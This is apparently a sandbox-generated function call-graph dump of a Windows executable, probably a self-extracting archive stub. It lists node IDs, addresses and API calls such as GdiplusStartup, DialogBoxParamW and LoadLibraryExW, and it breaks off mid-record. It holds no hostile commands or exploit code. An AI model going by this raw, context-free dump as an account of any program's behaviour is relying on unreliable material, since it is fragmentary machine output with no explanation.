25373->25375 25376 13ca7e 25373->25376 25378 13ca07 __cftof __vsnwprintf_l 25375->25378 25379 138e06 __vsnwprintf_l 21 API calls 25375->25379 25377 12fbbc _ValidateLocalCookies 5 API calls 25376->25377 25380 13b92e 25377->25380 25381 13ca78 25378->25381 25383 13ca4c MultiByteToWideChar 25378->25383 25379->25378 25385 13ab78 25380->25385 25390 13abc3 20 API calls _free 25381->25390 25383->25381 25384 13ca68 GetStringTypeW 25383->25384 25384->25381 25386 134636 __cftof 38 API calls 25385->25386 25387 13ab8b 25386->25387 25391 13a95b 25387->25391 25390->25376 25392 13a976 __vsnwprintf_l 25391->25392 25393 13a99c MultiByteToWideChar 25392->25393 25395 13a9c6 25393->25395 25405 13ab50 25393->25405 25394 12fbbc _ValidateLocalCookies 5 API calls 25396 13ab63 25394->25396 25399 138e06 __vsnwprintf_l 21 API calls 25395->25399 25403 13a9e7 __vsnwprintf_l 25395->25403 25396->25369 25397 13aa30 MultiByteToWideChar 25398 13aa9c 25397->25398 25400 13aa49 25397->25400 25427 13abc3 20 API calls _free 25398->25427 25399->25403 25418 13af6c 25400->25418 25403->25397 25403->25398 25405->25394 25406 13aa73 25406->25398 25410 13af6c __vsnwprintf_l 11 API calls 25406->25410 25407 13aaab 25408 138e06 __vsnwprintf_l 21 API calls 25407->25408 25412 13aacc __vsnwprintf_l 25407->25412 25408->25412 25409 13ab41 25426 13abc3 20 API calls _free 25409->25426 25410->25398 25412->25409 25413 13af6c __vsnwprintf_l 11 API calls 25412->25413 25414 13ab20 25413->25414 25414->25409 25415 13ab2f WideCharToMultiByte 25414->25415 25415->25409 25416 13ab6f 25415->25416 25428 13abc3 20 API calls _free 25416->25428 25419 13ac98 _unexpected 5 API calls 25418->25419 25420 13af93 25419->25420 25423 13af9c 25420->25423 25429 13aff4 10 API calls 3 library calls 25420->25429 25422 13afdc LCMapStringW 25422->25423 25424 12fbbc _ValidateLocalCookies 5 API calls 25423->25424 25425 13aa60 25424->25425 25425->25398 25425->25406 25425->25407 25426->25398 25427->25405 25428->25398 25429->25422 25520 137f6e 52 API calls 2 library calls 25454 13b49d 6 API calls _ValidateLocalCookies 25482 129580 6 API calls 25501 12c793 102 API calls 4 library calls 25456 12c793 97 API calls 4 library calls 25484 12b18d 78 API calls 23454 12f3b2 23455 12f3be ___scrt_is_nonwritable_in_current_image 23454->23455 23486 12eed7 23455->23486 23457 12f3c5 23458 12f518 23457->23458 23462 12f3ef 23457->23462 23559 12f838 4 API calls 2 library calls 23458->23559 23460 12f51f 23552 137f58 23460->23552 23473 12f42e ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 23462->23473 23497 138aed 23462->23497 23468 12f40e 23470 12f48f 23505 12f953 GetStartupInfoW __cftof 23470->23505 23472 12f495 23506 138a3e 51 API calls 23472->23506 23473->23470 23555 137af4 38 API calls 2 library calls 23473->23555 23476 12f49d 23507 12df1e 23476->23507 23480 12f4b1 23480->23460 23481 12f4b5 23480->23481 23482 12f4be 23481->23482 23557 137efb 28 API calls _abort 23481->23557 23558 12f048 12 API calls ___scrt_uninitialize_crt 23482->23558 23485 12f4c6 23485->23468 23487 12eee0 23486->23487 23561 12f654 IsProcessorFeaturePresent 23487->23561 23489 12eeec 23562 132a5e 23489->23562 23491 12eef1 23496 12eef5 23491->23496 23570 138977 23491->23570 23494 12ef0c 23494->23457 23496->23457 23500 138b04 23497->23500 23498 12fbbc _ValidateLocalCookies 5 API calls 23499 12f408 23498->23499 23499->23468 23501 138a91 23499->23501 23500->23498 23502 138ac0 23501->23502 23503 12fbbc _ValidateLocalCookies 5 API calls 23502->23503 23504 138ae9 23503->23504 23504->23473 23505->23472 23506->23476 23629 120863 23507->23629 23511 12df3d 23678 12ac16 23511->23678 23513 12df46 __cftof 23514 12df59 GetCommandLineW 23513->23514 23515 12dfe6 GetModuleFileNameW SetEnvironmentVariableW GetLocalTime 23514->23515 23516 12df68 23514->23516 23693 114092 23515->23693 23682 12c5c4 23516->23682 23522 12dfe0 23687 12dbde 23522->23687 23523 12df76 OpenFileMappingW 23525 12dfd6 CloseHandle 23523->23525 23526 12df8f MapViewOfFile 23523->23526 23525->23515 23529 12dfa0 __InternalCxxFrameHandler 23526->23529 23530 12dfcd UnmapViewOfFile 23526->23530 23534 12dbde 2 API calls 23529->23534 23530->23525 23536 12dfbc 23534->23536 23535 1290b7 8 API calls 23537 12e0aa DialogBoxParamW 23535->23537 23536->23530 23538 12e0e4 23537->23538 23539 12e0f6 Sleep 23538->23539 23540 12e0fd 23538->23540 23539->23540 23543 12e10b 23540->23543 23726 12ae2f CompareStringW SetCurrentDirectoryW __cftof _wcslen 23540->23726 23542 12e12a DeleteObject 23544 12e146 23542->23544 23545 12e13f DeleteObject 23542->23545 23543->23542 23546 12e177 23544->23546 23547 12e189 23544->23547 23545->23544 23727 12dc3b 6 API calls 23546->23727 23723 12ac7c 23547->23723 23549 12e17d CloseHandle 23549->23547 23551 12e1c3 23556 12f993 GetModuleHandleW 23551->23556 24049 137cd5 23552->24049 23555->23470 23556->23480 23557->23482 23558->23485 23559->23460 23561->23489 23574 133b07 23562->23574 23566 132a6f 23567 132a7a 23566->23567 23588 133b43 DeleteCriticalSection 23566->23588 23567->23491 23569 132a67 23569->23491 23617 13c05a 23570->23617 23573 132a7d 7 API calls 2 library calls 23573->23496 23575 133b10 23574->23575 23577 133b39 23575->23577 23578 132a63 23575->23578 23589 133d46 23575->23589 23594 133b43 DeleteCriticalSection 23577->23594 23578->23569 23580 132b8c 23578->23580 23610 133c57 23580->23610 23583 132ba1 23583->23566 23585 132baf 23586 132bbc 23585->23586 23616 132bbf 6 API calls ___vcrt_FlsFree 23585->23616 23586->23566 23588->23569 23595 133c0d 23589->23595 23592 133d7e InitializeCriticalSectionAndSpinCount 23593 133d69 23592->23593 23593->23575 23594->23578 23596 133c26 23595->23596 23600 133c4f 23595->23600 23596->23600 23602 133b72 23596->23602 23599 133c3b GetProcAddress 23599->23600 23601 133c49 23599->23601 23600->23592 23600->23593 23601->23600 23607 133b7e ___vcrt_FlsSetValue 23602->23607 23603 133bf3 23603->23599 23603->23600 23604 133b95 LoadLibraryExW 23605 133bb3 GetLastError 23604->23605 23606 133bfa 23604->23606 23605->23607 23606->23603 23608 133c02 FreeLibrary 23606->23608 23607->23603 23607->23604 23609 133bd5 LoadLibraryExW 23607->23609 23608->23603 23609->23606 23609->23607 23611 133c0d ___vcrt_FlsSetValue 5 API calls 23610->23611 23612 133c71 23611->23612 23613 133c8a TlsAlloc 23612->23613 23614 132b96 23612->23614 23614->23583 23615 133d08 6 API calls ___vcrt_FlsSetValue 23614->23615 23615->23585 23616->23583 23620 13c073 23617->23620 23619 12eefe 23619->23494 23619->23573 23621 12fbbc 23620->23621 23622 12fbc4 23621->23622 23623 12fbc5 IsProcessorFeaturePresent 23621->23623 23622->23619 23625 12fc07 23623->23625 23628 12fbca SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 23625->23628 23627 12fcea 23627->23619 23628->23627 23728 12ec50 23629->23728 23632 1208e7 23634 120c14 GetModuleFileNameW 23632->23634 23739 1375fb 42 API calls __vsnwprintf_l 23632->23739 23633 120888 GetProcAddress 23635 1208b9 GetProcAddress 23633->23635 23638 1208a1 23633->23638 23645 120c32 23634->23645 23639 1208cb 23635->23639 23637 120b54 23637->23634 23640 120b5f GetModuleFileNameW CreateFileW 23637->23640 23638->23635 23639->23632 23641 120c08 CloseHandle 23640->23641 23642 120b8f SetFilePointer 23640->23642 23641->23634 23642->23641 23643 120b9d ReadFile 23642->23643 23643->23641 23646 120bbb 23643->23646 23648 120c94 GetFileAttributesW 23645->23648 23650 120c5d CompareStringW 23645->23650 23651 120cac 23645->23651 23730 11b146 23645->23730 23733 12081b 23645->23733 23646->23641 23649 12081b 2 API calls 23646->23649 23648->23645 23648->23651 23649->23646 23650->23645 23652 120cb7 23651->23652 23654 120cec 23651->23654 23655 120cd0 GetFileAttributesW 23652->23655 23657 120ce8 23652->23657 23653 120dfb 23677 12a64d GetCurrentDirectoryW 23653->23677 23654->23653 23656 11b146 GetVersionExW 23654->23656 23655->23652 23655->23657 23658 120d06 23656->23658 23657->23654 23659 120d73 23658->23659 23660 120d0d 23658->23660 23661 114092 _swprintf 51 API calls 23659->23661 23662 12081b 2 API calls 23660->23662 23663 120d9b AllocConsole 23661->23663 23664 120d17 23662->23664 23665 120df3 ExitProcess 23663->23665 23666 120da8 GetCurrentProcessId AttachConsole 23663->23666 23667 12081b 2 API calls 23664->23667 23744 133e13 23666->23744 23669 120d21 23667->23669 23740 11e617 23669->23740 23670 120dc9 GetStdHandle WriteConsoleW Sleep FreeConsole 23670->23665 23673 114092 _swprintf 51 API calls 23674 120d4f 23673->23674 23675 11e617 53 API calls 23674->23675 23676 120d5e 23675->23676 23676->23665 23677->23511 23679 12081b 2 API calls 23678->23679 23680 12ac2a OleInitialize 23679->23680 23681 12ac4d GdiplusStartup SHGetMalloc 23680->23681 23681->23513 23686 12c5ce 23682->23686 23683 12c6e4 23683->23522 23683->23523 23685 121fac CharUpperW 23685->23686 23686->23683 23686->23685 23769 11f3fa 23686->23769 23688 12ec50 23687->23688 23689 12dbeb SetEnvironmentVariableW 23688->23689 23691 12dc0e 23689->23691 23690 12dc36 23690->23515 23691->23690 23692 12dc2a SetEnvironmentVariableW 23691->23692 23692->23690 23798 114065 23693->23798 23696 12b6dd LoadBitmapW 23697 12b70b GetObjectW 23696->23697 23698 12b6fe 23696->23698 23700 12b71a 23697->23700 23875 12a6c2 FindResourceW 23698->23875 23870 12a5c6 23700->23870 23704 12b770 23715 11da42 23704->23715 23705 12b74c 23891 12a605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23705->23891 23706 12a6c2 13 API calls 23708 12b73d 23706->23708 23708->23705 23710 12b743 DeleteObject 23708->23710 23709 12b754 23892 12a5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23709->23892 23710->23705 23712 12b75d 23893 12a80c 8 API calls 23712->23893 23714 12b764 DeleteObject 23714->23704 23904 11da67 23715->23904 23720 1290b7 24037 12eb38 23720->24037 23724 12acab GdiplusShutdown CoUninitialize 23723->23724 23724->23551 23726->23543 23727->23549 23729 12086d GetModuleHandleW 23728->23729 23729->23632 23729->23633 23731 11b196 23730->23731 23732 11b15a GetVersionExW 23730->23732 23731->23645 23732->23731 23734 12ec50 23733->23734 23735 120828 GetSystemDirectoryW 23734->23735 23736 120840 23735->23736 23737 12085e 23735->23737 23738 120851 LoadLibraryW 23736->23738 23737->23645 23738->23737 23739->23637 23741 11e627 23740->23741 23746 11e648 23741->23746 23745 133e1b 23744->23745 23745->23670 23745->23745 23752 11d9b0 23746->23752 23749 11e645 23749->23673 23750 11e66b LoadStringW 23750->23749 23751 11e682 LoadStringW 23750->23751 23751->23749 23757 11d8ec 23752->23757 23754 11d9cd 23755 11d9e2 23754->23755 23765 11d9f0 26 API calls 23754->23765 23755->23749 23755->23750 23758 11d904 23757->23758 23764 11d984 _strncpy 23757->23764 23761 11d928 23758->23761 23766 121da7 WideCharToMultiByte 23758->23766 23760 11d959 23768 136159 26 API calls 3 library calls 23760->23768 23761->23760 23767 11e5b1 50 API calls __vsnprintf 23761->23767 23764->23754 23765->23755 23766->23761 23767->23760 23768->23764 23770 11f420 _wcslen 23769->23770 23771 11f409 __cftof 23769->23771 23773 11f303 23770->23773 23771->23686 23774 11f314 __InternalCxxFrameHandler 23773->23774 23777 11f344 23774->23777 23778 11f35c 23777->23778 23779 11f352 23777->23779 23781 11f3d1 GetCurrentProcessId 23778->23781 23782 11f376 23778->23782 23789 11f2c5 23779->23789 23788 11f33e 23781->23788 23782->23788 23795 116c36 76 API calls __vswprintf_c_l 23782->23795 23784 11f399 23796 116dcb 76 API calls 23784->23796 23786 11f3a2 23797 116c31 RaiseException CallUnexpected 23786->23797 23788->23771 23790 11f2fd 23789->23790 23791 11f2ce 23789->23791 23790->23778 23792 12081b 2 API calls 23791->23792 23793 11f2d8 23792->23793 23793->23790 23794 11f2de GetProcAddress GetProcAddress 23793->23794 23794->23790 23795->23784 23796->23786 23797->23788 23799 11407c __vswprintf_c_l 23798->23799 23802 135fd4 23799->23802 23805 134097 23802->23805 23806 1340d7 23805->23806 23807 1340bf 23805->23807 23806->23807 23809 1340df 23806->23809 23822 1391a8 20 API calls __dosmaperr 23807->23822 23824 134636 23809->23824 23810 1340c4 23823 139087 26 API calls __cftof 23810->23823 23814 12fbbc _ValidateLocalCookies 5 API calls 23817 114086 SetEnvironmentVariableW GetModuleHandleW LoadIconW 23814->23817 23816 134167 23833 1349e6 51 API calls 4 library calls 23816->23833 23817->23696 23820 1340cf 23820->23814 23821 134172 23834 1346b9 20 API calls _free 23821->23834 23822->23810 23823->23820 23825 134653 23824->23825 23826 1340ef 23824->23826 23825->23826 23835 1397e5 GetLastError 23825->23835 23832 134601 20 API calls 2 library calls 23826->23832 23828 134674 23856 13993a 38 API calls __cftof 23828->23856 23830 13468d 23857 139967 38 API calls __cftof 23830->23857 23832->23816 23833->23821 23834->23820 23836 139807 23835->23836 23837 1397fb 23835->23837 23859 13b136 20 API calls 2 library calls 23836->23859 23858 13ae5b 11 API calls 2 library calls 23837->23858 23840 139801 23840->23836 23842 139850 SetLastError 23840->23842 23841 139813 23843 13981b 23841->23843 23866 13aeb1 11 API calls 2 library calls 23841->23866 23842->23828 23860 138dcc 23843->23860 23846 139830 23846->23843 23848 139837 23846->23848 23847 139821 23850 13985c SetLastError 23847->23850 23867 139649 20 API calls _unexpected 23848->23867 23868 138d24 38 API calls _abort 23850->23868 23851 139842 23853 138dcc _free 20 API calls 23851->23853 23855 139849 23853->23855 23855->23842 23855->23850 23856->23830 23857->23826 23858->23840 23859->23841 23861 138dd7 RtlFreeHeap 23860->23861 23862 138e00 _free 23860->23862 23861->23862 23863 138dec 23861->23863 23862->23847 23869 1391a8 20 API calls __dosmaperr 23863->23869 23865 138df2 GetLastError 23865->23862 23866->23846 23867->23851 23869->23865 23894 12a5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23870->23894 23872 12a5cd 23873 12a5d9 23872->23873 23895 12a605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23872->23895 23873->23704 23873->23705 23873->23706 23876 12a6e5 SizeofResource 23875->23876 23877 12a7d3 23875->23877 23876->23877 23878 12a6fc LoadResource 23876->23878 23877->23697 23877->23700 23878->23877 23879 12a711 LockResource 23878->23879 23879->23877 23880 12a722 GlobalAlloc 23879->23880 23880->23877 23881 12a73d GlobalLock 23880->23881 23882 12a7cc GlobalFree 23881->23882 23883 12a74c __InternalCxxFrameHandler 23881->23883 23882->23877 23884 12a754 CreateStreamOnHGlobal 23883->23884 23885 12a7c5 GlobalUnlock 23884->23885 23886 12a76c 23884->23886 23885->23882 23896 12a626 GdipAlloc 23886->23896 23889 12a7b0 23889->23885 23890 12a79a GdipCreateHBITMAPFromBitmap 23890->23889 23891->23709 23892->23712 23893->23714 23894->23872 23895->23873 23897 12a638 23896->23897 23899 12a645 23896->23899 23900 12a3b9 23897->23900 23899->23885 23899->23889 23899->23890 23901 12a3e1 GdipCreateBitmapFromStream 23900->23901 23902 12a3da GdipCreateBitmapFromStreamICM 23900->23902 23903 12a3e6 23901->23903 23902->23903 23903->23899 23905 11da75 __EH_prolog 23904->23905 23906 11daa4 GetModuleFileNameW 23905->23906 23907 11dad5 23905->23907 23908 11dabe 23906->23908 23950 1198e0 23907->23950 23908->23907 23910 11db31 23961 136310 23910->23961 23912 11e261 78 API calls 23915 11db05 23912->23915 23915->23910 23915->23912 23929 11dd4a 23915->23929 23916 11db44 23917 136310 26 API calls 23916->23917 23925 11db56 ___vcrt_FlsSetValue 23917->23925 23918 11dc85 23918->23929 23997 119d70 81 API calls 23918->23997 23922 11dc9f ___std_exception_copy 23923 119bd0 82 API calls 23922->23923 23922->23929 23926 11dcc8 ___std_exception_copy 23923->23926 23925->23918 23925->23929 23975 119e80 23925->23975 23991 119bd0 23925->23991 23996 119d70 81 API calls 23925->23996 23928 11dcd3 ___vcrt_FlsSetValue _wcslen ___std_exception_copy 23926->23928 23926->23929 23998 121b84 MultiByteToWideChar 23926->23998 23928->23929 23931 11e159 23928->23931 23944 121da7 WideCharToMultiByte 23928->23944 23999 11e5b1 50 API calls __vsnprintf 23928->23999 24000 136159 26 API calls 3 library calls 23928->24000 24001 138cce 26 API calls 2 library calls 23928->24001 24002 137625 26 API calls 2 library calls 23928->24002 24003 11e27c 78 API calls 23928->24003 23984 11959a 23929->23984 23941 11e1de 23931->23941 24004 138cce 26 API calls 2 library calls 23931->24004 23933 11e16e 24005 137625 26 API calls 2 library calls 23933->24005 23934 11e1c6 24006 11e27c 78 API calls 23934->24006 23935 11e214 23937 136310 26 API calls 23935->23937 23940 11e22d 23937->23940 23939 11e261 78 API calls 23939->23941 23942 136310 26 API calls 23940->23942 23941->23935 23941->23939 23942->23929 23944->23928 23948 11e29e GetModuleHandleW FindResourceW 23949 11da55 23948->23949 23949->23720 23951 1198ea 23950->23951 23952 11994b CreateFileW 23951->23952 23953 11996c GetLastError 23952->23953 23956 1199bb 23952->23956 24007 11bb03 23953->24007 23955 11998c 23955->23956 23958 119990 CreateFileW GetLastError 23955->23958 23957 1199ff 23956->23957 23959 1199e5 SetFileTime 23956->23959 23957->23915 23958->23956 23960 1199b5 23958->23960 23959->23957 23960->23956 23962 136349 23961->23962 23963 13634d 23962->23963 23974 136375 23962->23974 24011 1391a8 20 API calls __dosmaperr 23963->24011 23965 136352 24012 139087 26 API calls __cftof 23965->24012 23966 136699 23968 12fbbc _ValidateLocalCookies 5 API calls 23966->23968 23970 1366a6 23968->23970 23969 13635d 23971 12fbbc _ValidateLocalCookies 5 API calls 23969->23971 23970->23916 23973 136369 23971->23973 23973->23916 23974->23966 24013 136230 5 API calls _ValidateLocalCookies 23974->24013 23976 119e92 23975->23976 23980 119ea5 23975->23980 23979 119eb0 23976->23979 24014 116d5b 77 API calls 23976->24014 23978 119eb8 SetFilePointer 23978->23979 23981 119ed4 GetLastError 23978->23981 23979->23925 23980->23978 23980->23979 23981->23979 23982 119ede 23981->23982 23982->23979 24015 116d5b 77 API calls 23982->24015 23985 1195cf 23984->23985 23986 1195be 23984->23986 23985->23948 23986->23985 23987 1195d1 23986->23987 23988 1195ca 23986->23988 24021 119620 23987->24021 24016 11974e 23988->24016 23992 119bdc 23991->23992 23994 119be3 23991->23994 23992->23925 23994->23992 23995 119785 GetStdHandle ReadFile GetLastError GetLastError GetFileType 23994->23995 24036 116d1a 77 API calls 23994->24036 23995->23994 23996->23925 23997->23922 23998->23928 23999->23928 24000->23928 24001->23928 24002->23928 24003->23928 24004->23933 24005->23934 24006->23941 24008 11bb10 _wcslen 24007->24008 24009 11bbb8 GetCurrentDirectoryW 24008->24009 24010 11bb39 _wcslen 24008->24010 24009->24010 24010->23955 24011->23965 24012->23969 24013->23974 24014->23980 24015->23979 24017 119781 24016->24017 24018 119757 24016->24018 24017->23985 24018->24017 24027 11a1e0 24018->24027 24022 11964a 24021->24022 24024 11962c 24021->24024 24023 119669 24022->24023 24035 116bd5 76 API calls 24022->24035 24023->23985 24024->24022 24025 119638 CloseHandle 24024->24025 24025->24022 24028 12ec50 24027->24028 24029 11a1ed DeleteFileW 24028->24029 24030 11a200 24029->24030 24031 11977f 24029->24031 24032 11bb03 GetCurrentDirectoryW 24030->24032 24031->23985 24033 11a214 24032->24033 24033->24031 24034 11a218 DeleteFileW 24033->24034 24034->24031 24035->24023 24036->23994 24039 12eb3d ___std_exception_copy 24037->24039 24038 1290d6 24038->23535 24039->24038 24042 12eb59 24039->24042 24046 137a5e 7 API calls 2 library calls 24039->24046 24041 12f5c9 24048 13238d RaiseException 24041->24048 24042->24041 24047 13238d RaiseException 24042->24047 24045 12f5e6 24046->24039 24047->24041 24048->24045 24050 137ce1 _unexpected 24049->24050 24051 137cfa 24050->24051 24052 137ce8 24050->24052 24073 13ac31 EnterCriticalSection 24051->24073 24088 137e2f GetModuleHandleW 24052->24088 24055 137ced 24055->24051 24089 137e73 GetModuleHandleExW 24055->24089 24056 137d9f 24077 137ddf 24056->24077 24060 137d01 24060->24056 24062 137d76 24060->24062 24074 1387e0 24060->24074 24063 137d8e 24062->24063 24067 138a91 _abort 5 API calls 24062->24067 24068 138a91 _abort 5 API calls 24063->24068 24064 137de8 24097 142390 5 API calls _ValidateLocalCookies 24064->24097 24065 137dbc 24080 137dee 24065->24080 24067->24063 24068->24056 24073->24060 24098 138519 24074->24098 24117 13ac81 LeaveCriticalSection 24077->24117 24079 137db8 24079->24064 24079->24065 24118 13b076 24080->24118 24083 137e1c 24086 137e73 _abort 8 API calls 24083->24086 24084 137dfc GetPEB 24084->24083 24085 137e0c GetCurrentProcess TerminateProcess 24084->24085 24085->24083 24087 137e24 ExitProcess 24086->24087 24088->24055 24090 137ec0 24089->24090 24091 137e9d GetProcAddress 24089->24091 24092 137ec6 FreeLibrary 24090->24092 24093 137ecf 24090->24093 24094 137eb2 24091->24094 24092->24093 24095 12fbbc _ValidateLocalCookies 5 API calls 24093->24095 24094->24090 24096 137cf9 24095->24096 24096->24051 24101 1384c8 24098->24101 24100 13853d 24100->24062 24102 1384d4 ___scrt_is_nonwritable_in_current_image 24101->24102 24109 13ac31 EnterCriticalSection 24102->24109 24104 1384e2 24110 138569 24104->24110 24108 138500 _abort 24108->24100 24109->24104 24113 138589 24110->24113 24114 138591 24110->24114 24111 12fbbc _ValidateLocalCookies 5 API calls 24112 1384ef 24111->24112 24116 13850d LeaveCriticalSection _abort 24112->24116 24113->24111 24114->24113 24115 138dcc _free 20 API calls 24114->24115 24115->24113 24116->24108 24117->24079 24119 13b091 24118->24119 24120 13b09b 24118->24120 24122 12fbbc _ValidateLocalCookies 5 API calls 24119->24122 24124 13ac98 24120->24124 24123 137df8 24122->24123 24123->24083 24123->24084 24125 13acc8 24124->24125 24128 13acc4 24124->24128 24125->24119 24127 13acf4 GetProcAddress 24129 13ad04 _unexpected 24127->24129 24128->24125 24130 13ace8 24128->24130 24131 13ad34 24128->24131 24129->24125 24130->24125 24130->24127 24132 13ad55 LoadLibraryExW 24131->24132 24137 13ad4a 24131->24137 24133 13ad72 GetLastError 24132->24133 24134 13ad8a 24132->24134 24133->24134 24135 13ad7d LoadLibraryExW 24133->24135 24136 13ada1 FreeLibrary 24134->24136 24134->24137 24135->24134 24136->24137 24137->24128 25485 12b1b0 GetDlgItem EnableWindow ShowWindow SendMessageW 24138 12e5b1 24139 12e578 24138->24139 24141 12e85d 24139->24141 24167 12e5bb 24141->24167 24143 12e86d 24144 12e8ca 24143->24144 24145 12e8ee 24143->24145 24146 12e7fb DloadReleaseSectionWriteAccess 6 API calls 24144->24146 24148 12e966 LoadLibraryExA 24145->24148 24149 12e9c7 24145->24149 24152 12e9d9 24145->24152 24155 12ea95 24145->24155 24147 12e8d5 RaiseException 24146->24147 24162 12eac3 24147->24162 24148->24149 24150 12e979 GetLastError 24148->24150 24151 12e9d2 FreeLibrary 24149->24151 24149->24152 24153 12e9a2 24150->24153 24161 12e98c 24150->24161 24151->24152 24154 12ea37 GetProcAddress 24152->24154 24152->24155 24157 12e7fb DloadReleaseSectionWriteAccess 6 API calls 24153->24157 24154->24155 24156 12ea47 GetLastError 24154->24156 24176 12e7fb 24155->24176 24159 12ea5a 24156->24159 24158 12e9ad RaiseException 24157->24158 24158->24162 24159->24155 24163 12e7fb DloadReleaseSectionWriteAccess 6 API calls 24159->24163 24161->24149 24161->24153 24162->24139 24164 12ea7b RaiseException 24163->24164 24165 12e5bb ___delayLoadHelper2@8 6 API calls 24164->24165 24166 12ea92 24165->24166 24166->24155 24168 12e5c7 24167->24168 24169 12e5ed 24167->24169 24184 12e664 24168->24184 24169->24143 24171 12e5cc 24172 12e5e8 24171->24172 24187 12e78d 24171->24187 24192 12e5ee GetModuleHandleW GetProcAddress GetProcAddress 24172->24192 24175 12e836 24175->24143 24177 12e82f 24176->24177 24178 12e80d 24176->24178 24177->24162 24179 12e664 DloadReleaseSectionWriteAccess 3 API calls 24178->24179 24180 12e812 24179->24180 24181 12e82a 24180->24181 24182 12e78d DloadProtectSection 3 API calls 24180->24182 24195 12e831 GetModuleHandleW GetProcAddress GetProcAddress DloadReleaseSectionWriteAccess 24181->24195 24182->24181 24193 12e5ee GetModuleHandleW GetProcAddress GetProcAddress 24184->24193 24186 12e669 24186->24171 24188 12e7a2 DloadProtectSection 24187->24188 24189 12e7dd VirtualProtect 24188->24189 24190 12e7a8 24188->24190 24194 12e6a3 VirtualQuery GetSystemInfo 24188->24194 24189->24190 24190->24172 24192->24175 24193->24186 24194->24189 24195->24177 25523 121bbd GetCPInfo IsDBCSLeadByte 25524 12f3a0 27 API calls 25458 13a4a0 71 API calls _free 25461 12dca1 DialogBoxParamW 25502 13a6a0 31 API calls 2 library calls 25462 1408a0 IsProcessorFeaturePresent 25487 12eda7 48 API calls _unexpected 25525 116faa 111 API calls 3 library calls 25463 12f4d3 20 API calls 24207 12e1d1 14 API calls ___delayLoadHelper2@8 25526 13a3d0 21 API calls 2 library calls 24208 1110d5 24213 115abd 24208->24213 24214 115ac7 __EH_prolog 24213->24214 24220 11b505 24214->24220 24216 115ad3 24226 115cac GetCurrentProcess GetProcessAffinityMask 24216->24226 24221 11b50f __EH_prolog 24220->24221 24227 11f1d0 82 API calls 24221->24227 24223 11b521 24228 11b61e 24223->24228 24227->24223 24229 11b630 __cftof 24228->24229 24232 1210dc 24229->24232 24235 12109e GetCurrentProcess GetProcessAffinityMask 24232->24235 24236 11b597 24235->24236 24236->24216 25527 142bd0 VariantClear 24237 12e2d7 24238 12e1db 24237->24238 24239 12e85d ___delayLoadHelper2@8 14 API calls 24238->24239 24239->24238 25504 130ada 51 API calls 2 library calls 24343 12dec2 24344 12decf 24343->24344 24345 11e617 53 API calls 24344->24345 24346 12dedc 24345->24346 24347 114092 _swprintf 51 API calls 24346->24347 24348 12def1 SetDlgItemTextW 24347->24348 24351 12b568 PeekMessageW 24348->24351 24352 12b583 GetMessageW 24351->24352 24353 12b5bc 24351->24353 24354 12b5a8 TranslateMessage DispatchMessageW 24352->24354 24355 12b599 IsDialogMessageW 24352->24355 24354->24353 24355->24353 24355->24354 25490 12b5c0 100 API calls 25528 1277c0 118 API calls 25529 12ffc0 RaiseException _com_error::_com_error CallUnexpected 25505 1262ca 123 API calls __InternalCxxFrameHandler 25491 1195f0 80 API calls 25507 115ef0 82 API calls 24366 1398f0 24374 13adaf 24366->24374 24370 13990c 24371 139919 24370->24371 24382 139920 11 API calls 24370->24382 24373 139904 24375 13ac98 _unexpected 5 API calls 24374->24375 24376 13add6 24375->24376 24377 13adee TlsAlloc 24376->24377 24378 13addf 24376->24378 24377->24378 24379 12fbbc _ValidateLocalCookies 5 API calls 24378->24379 24380 1398fa 24379->24380 24380->24373 24381 139869 20 API calls 2 library calls 24380->24381 24381->24370 24382->24373 24383 13abf0 24384 13abfb 24383->24384 24386 13ac24 24384->24386 24387 13ac20 24384->24387 24389 13af0a 24384->24389 24396 13ac50 DeleteCriticalSection 24386->24396 24390 13ac98 _unexpected 5 API calls 24389->24390 24391 13af31 24390->24391 24392 13af4f InitializeCriticalSectionAndSpinCount 24391->24392 24395 13af3a 24391->24395 24392->24395 24393 12fbbc _ValidateLocalCookies 5 API calls 24394 13af66 24393->24394 24394->24384 24395->24393 24396->24387 25465 1388f0 7 API calls ___scrt_uninitialize_crt 25493 12fd4f 9 API calls 2 library calls 25467 132cfb 38 API calls 4 library calls 24423 1113e1 84 API calls 2 library calls 24424 12b7e0 24425 12b7ea __EH_prolog 24424->24425 24592 111316 24425->24592 24428 12b82a 24431 12b89b 24428->24431 24432 12b838 24428->24432 24502 12b841 24428->24502 24429 12bf0f 24657 12d69e 24429->24657 24434 12b92e GetDlgItemTextW 24431->24434 24439 12b8b1 24431->24439 24435 12b878 24432->24435 24436 12b83c 24432->24436 24434->24435 24442 12b96b 24434->24442 24447 12b95f KiUserCallbackDispatcher 24435->24447 24435->24502 24445 11e617 53 API calls 24436->24445 24436->24502 24437 12bf2a SendMessageW 24438 12bf38 24437->24438 24440 12bf52 GetDlgItem SendMessageW 24438->24440 24441 12bf41 SendDlgItemMessageW 24438->24441 24444 11e617 53 API calls 24439->24444 24675 12a64d GetCurrentDirectoryW 24440->24675 24441->24440 24443 12b980 GetDlgItem 24442->24443 24590 12b974 24442->24590 24448 12b9b7 SetFocus 24443->24448 24449 12b994 SendMessageW SendMessageW 24443->24449 24450 12b8ce SetDlgItemTextW 24444->24450 24451 12b85b 24445->24451 24447->24502 24453 12b9c7 24448->24453 24468 12b9e0 24448->24468 24449->24448 24454 12b8d9 24450->24454 24697 11124f SHGetMalloc 24451->24697 24452 12bf82 GetDlgItem 24456 12bfa5 SetWindowTextW 24452->24456 24457 12bf9f 24452->24457 24458 11e617 53 API calls 24453->24458 24461 12b8e6 GetMessageW 24454->24461 24454->24502 24676 12abab GetClassNameW 24456->24676 24457->24456 24462 12b9d1 24458->24462 24459 12be55 24463 11e617 53 API calls 24459->24463 24466 12b8fd IsDialogMessageW 24461->24466 24461->24502 24698 12d4d4 24462->24698 24470 12be65 SetDlgItemTextW 24463->24470 24466->24454 24472 12b90c TranslateMessage DispatchMessageW 24466->24472 24474 11e617 53 API calls 24468->24474 24469 12c1fc SetDlgItemTextW 24469->24502 24473 12be79 24470->24473 24472->24454 24475 11e617 53 API calls 24473->24475 24477 12ba17 24474->24477 24513 12be9c _wcslen 24475->24513 24476 12bff0 24481 12c020 24476->24481 24484 11e617 53 API calls 24476->24484 24478 114092 _swprintf 51 API calls 24477->24478 24483 12ba29 24478->24483 24479 